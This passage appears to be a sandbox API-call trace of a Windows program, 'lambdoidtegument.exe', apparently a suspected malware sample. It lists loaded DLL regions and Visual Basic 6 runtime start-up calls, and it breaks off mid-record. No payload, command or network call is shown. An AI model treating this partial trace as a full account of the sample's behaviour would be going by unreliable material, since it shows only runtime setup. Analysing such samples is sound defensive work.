entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1025 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1026 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1027 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1028 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1029 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1030 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1031 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1032 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1033 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1034 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1035 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1036 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1037 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1038 start_va = 0x1200000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1039 start_va = 0x1310000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 1040 start_va = 0x1710000 end_va = 0x19defff entry_point = 0x1710000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1041 start_va = 0x550000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1042 start_va = 0x19e0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1043 start_va = 0x390000 end_va = 0x3ebfff entry_point = 0x390000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1044 start_va = 0x390000 end_va = 0x3ebfff entry_point = 0x390000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1045 start_va 
= 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1046 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1047 start_va = 0x19e0000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1048 start_va = 0x1b60000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 1049 start_va = 0x1200000 end_va = 0x12defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1050 start_va = 0x1300000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1051 start_va = 0x1ba0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1052 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1054 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1056 start_va = 0x1cc0000 end_va = 0x20bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 1057 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1058 start_va = 0x3a0000 end_va = 0x3dbfff 
entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1059 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1060 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1061 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1062 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1063 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1064 start_va = 0x19e0000 end_va = 0x1a5ffff entry_point = 0x19e0000 region_type = mapped_file name = "~dff8ff715eb6fd8eb1.tmp" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DFF8FF715EB6FD8EB1.TMP" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dff8ff715eb6fd8eb1.tmp") Region: id = 1065 start_va = 0x1ac0000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 1066 start_va = 0x1ba0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1067 start_va = 0x1cb0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = 
"private_0x0000000001cb0000" filename = "" Region: id = 1068 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1069 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1070 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1071 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1072 start_va = 0x3a0000 end_va = 0x3a7fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1073 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1074 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1075 start_va = 0x20c0000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1076 start_va = 0x20c0000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1077 start_va = 0x21c0000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: 
id = 1078 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1079 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1080 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1081 start_va = 0x2200000 end_va = 0xa1fffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1082 start_va = 0x400000 end_va = 0x429fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1083 start_va = 0xa340000 end_va = 0xa47cfff entry_point = 0x0 region_type = private name = "private_0x000000000a340000" filename = "" Region: id = 1084 start_va = 0xa480000 end_va = 0xa6fafff entry_point = 0x0 region_type = private name = "private_0x000000000a480000" filename = "" Region: id = 1085 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1086 start_va = 0x3b0000 end_va = 0x3d9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1087 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1088 start_va = 0xa200000 end_va = 0xa35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a200000" filename = "" Region: id = 1461 start_va = 0x3e0000 end_va = 0x3ecfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1462 start_va = 0x550000 end_va = 
0x579fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1463 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Thread: id = 63 os_tid = 0xb88 [0057.161] GetVersion () returned 0x1db10106 [0057.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c10000 [0057.166] GetProcAddress (hModule=0x76c10000, lpProcName="IsTNT") returned 0x0 [0057.167] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1310000 [0057.168] VirtualAlloc (lpAddress=0x1310000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1310000 [0057.169] GetCurrentThreadId () returned 0xb88 [0057.169] GetCommandLineA () returned="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0057.169] GetEnvironmentStringsW () returned 0x1d3a98* [0057.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1166, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1166 [0057.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1166, lpMultiByteStr=0x13007d0, cbMultiByte=1166, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1166 [0057.169] FreeEnvironmentStringsW (penv=0x1d3a98) returned 1 [0057.169] GetStartupInfoA (in: lpStartupInfo=0x12f9d4 | out: lpStartupInfo=0x12f9d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.169] GetStdHandle 
(nStdHandle=0xfffffff6) returned 0x3 [0057.169] GetFileType (hFile=0x3) returned 0x0 [0057.169] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.170] GetFileType (hFile=0x7) returned 0x0 [0057.170] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0057.170] GetFileType (hFile=0xb) returned 0x0 [0057.170] SetHandleCount (uNumber=0x20) returned 0x20 [0057.170] GetACP () returned 0x4e4 [0057.170] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f9fc | out: lpCPInfo=0x12f9fc) returned 1 [0057.170] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.171] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76c10000 [0057.171] GetProcAddress (hModule=0x76c10000, lpProcName="IsProcessorFeaturePresent") returned 0x76c676b5 [0057.171] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0057.172] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x60 [0057.172] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x64 [0057.172] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.172] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0057.172] GetVersion () returned 0x1db10106 [0057.172] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0057.174] GetUserDefaultLCID () returned 0x409 [0057.174] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0057.174] GetSystemMetrics (nIndex=5) returned 1 [0057.174] GetSystemMetrics (nIndex=6) returned 1 [0057.174] GetSystemMetrics (nIndex=11) returned 32 [0057.174] GetSystemMetrics (nIndex=12) returned 32 [0057.174] GetSystemMetrics 
(nIndex=34) returned 132 [0057.174] GetSystemMetrics (nIndex=35) returned 38 [0057.174] GetSystemMetrics (nIndex=0) returned 1440 [0057.174] GetSystemMetrics (nIndex=1) returned 900 [0057.174] GetSystemMetrics (nIndex=32) returned 8 [0057.174] GetSystemMetrics (nIndex=33) returned 8 [0057.174] GetSystemMetrics (nIndex=42) returned 0 [0057.174] GetStockObject (i=15) returned 0x188000b [0057.174] GetStockObject (i=7) returned 0x1b00017 [0057.174] GetStockObject (i=6) returned 0x1b00018 [0057.174] GetStockObject (i=8) returned 0x1b00016 [0057.174] GetStockObject (i=4) returned 0x1900011 [0057.174] GetStockObject (i=2) returned 0x1900012 [0057.174] GetStockObject (i=0) returned 0x1900010 [0057.174] GetStockObject (i=5) returned 0x1900015 [0057.175] GetStockObject (i=13) returned 0x18a002e [0057.175] GetDC (hWnd=0x0) returned 0x200107f3 [0057.175] GetTextExtentPointA (in: hdc=0x200107f3, lpString="0", c=1, lpsz=0x12f9f8 | out: lpsz=0x12f9f8) returned 1 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=14) returned 1 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=12) returned 32 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=88) returned 96 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=90) returned 96 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=38) returned 32409 [0057.176] ReleaseDC (hWnd=0x0, hDC=0x200107f3) returned 1 [0057.177] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x768366bc) returned 0x0 [0057.177] GetCurrentThreadId () returned 0xb88 [0057.177] GetStartupInfoA (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.177] GetCurrentThreadId () 
returned 0xb88 [0057.177] GetCurrentThreadId () returned 0xb88 [0057.178] GetCommandLineA () returned="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0057.178] lstrlenA (lpString="") returned 0 [0057.178] lstrcpyA (in: lpString1=0x12feac, lpString2="" | out: lpString1="") returned="" [0057.178] SetErrorMode (uMode=0x8001) returned 0x1 [0057.178] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x12fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0057.178] GetUserDefaultLCID () returned 0x409 [0057.178] lstrcpyA (in: lpString1=0x12f868, lpString2="*" | out: lpString1="*") returned="*" [0057.178] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x12fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0057.178] GetSystemDefaultLCID () returned 0x409 [0057.178] GetUserDefaultLCID () returned 0x409 [0057.178] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x12fc76, cchData=2 | out: lpLCData=".") returned 2 [0057.178] GetStockObject (i=13) returned 0x18a002e [0057.178] GetObjectA (in: h=0x18a002e, c=60, pv=0x12fc3c | out: pv=0x12fc3c) returned 60 [0057.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x12fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0057.178] lstrcpyA (in: lpString1=0x12fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0057.178] lstrlenA (lpString="{xx}") returned 4 [0057.178] lstrlenA (lpString="VB98.CHM") returned 8 [0057.178] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0057.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x12fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0057.178] lstrcpyA (in: lpString1=0x12fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0057.178] lstrlenA (lpString="{xx}") returned 4 [0057.178] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0057.178] lstrcpyA 
(in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0057.178] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12fd90, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.178] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x12fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0057.178] lstrcpynA (in: lpString1=0x12fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0057.178] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0057.179] lstrcpyA (in: lpString1=0x1b617b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0057.179] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", cchSrc=-1, lpDestStr=0x12fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\BGC6U8~1\\APPDATA\\LOCAL\\TEMP\\LAMBDOIDTEGUMENT.EXE") returned 58 [0057.180] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x12fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x12fc54) returned 1 [0057.180] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x12fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x12fc54) returned 1 [0057.180] CreateSemaphoreA (lpSemaphoreAttributes=0x12fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?BGC6U8~1?APPDATA?LOCAL?TEMP?LAMBDOIDTEGUMENT.EXE") returned 0x74 [0057.180] GetLastError () returned 0x0 [0057.180] GetVersionExA (in: lpVersionInformation=0x12fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, 
dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.180] OleInitialize (pvReserved=0x0) returned 0x0 [0057.193] OaBuildVersion () returned 0x321396 [0057.193] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x75580000 [0057.193] GetLastError () returned 0x0 [0057.193] GetProcAddress (hModule=0x75580000, lpProcName="OleLoadPictureEx") returned 0x755e70a1 [0057.193] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc140 [0057.193] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b2 [0057.193] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x12fc34 | out: lpWndClass=0x12fc34) returned 0 [0057.193] RegisterClassA (lpWndClass=0x12fc34) returned 0xc19b [0057.194] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x12fc34 | out: lpWndClass=0x12fc34) returned 0 [0057.194] RegisterClassA (lpWndClass=0x12fc34) returned 0xc19d [0057.194] GetUserDefaultLCID () returned 0x409 [0057.194] GetSystemInfo (in: lpSystemInfo=0x12fbf4 | out: lpSystemInfo=0x12fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0057.194] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x3000, 
flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.214] VirtualProtect (in: lpAddress=0x390000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0057.214] GetCurrentProcess () returned 0xffffffff [0057.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x390000, dwSize=0x6000) returned 1 [0057.214] GlobalAddAtomA (lpString="VBDisabled") returned 0xc108 [0057.214] GetVersion () returned 0x1db10106 [0057.214] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75580000 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="DispCallFunc") returned 0x75593dcf [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="LoadTypeLibEx") returned 0x755907b7 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="UnRegisterTypeLib") returned 0x755b1ca9 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="CreateTypeLib2") returned 0x75598e70 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarDateFromUdate") returned 0x75597684 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarUdateFromDate") returned 0x7559cc98 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="GetAltMonthNames") returned 0x755c903a [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarNumFromParseNum") returned 0x75596231 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarParseNumFromStr") returned 0x75595fea [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromR4") returned 0x755a3f94 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromR8") returned 0x755a4e9e [0057.215] 
GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromDate") returned 0x755cdb72 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromI4") returned 0x755b2a8c [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromCy") returned 0x755cd737 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarR4FromDec") returned 0x755ce015 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x755ccc3d [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="GetRecordInfoFromGuids") returned 0x755cd1c4 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayGetRecordInfo") returned 0x755cd48c [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArraySetRecordInfo") returned 0x755cd4c6 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayGetIID") returned 0x755cd509 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArraySetIID") returned 0x7559e7bb [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayCopyData") returned 0x7559e496 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7559ddf1 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayCreateEx") returned 0x755cd53f [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarFormat") returned 0x755d2055 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatDateTime") returned 0x755d20ea [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatNumber") returned 0x755d2151 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatPercent") returned 0x755d21f5 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatCurrency") returned 0x755d2288 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarWeekdayName") returned 0x755d2335 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarMonthName") returned 0x755d23d5 [0057.216] GetProcAddress 
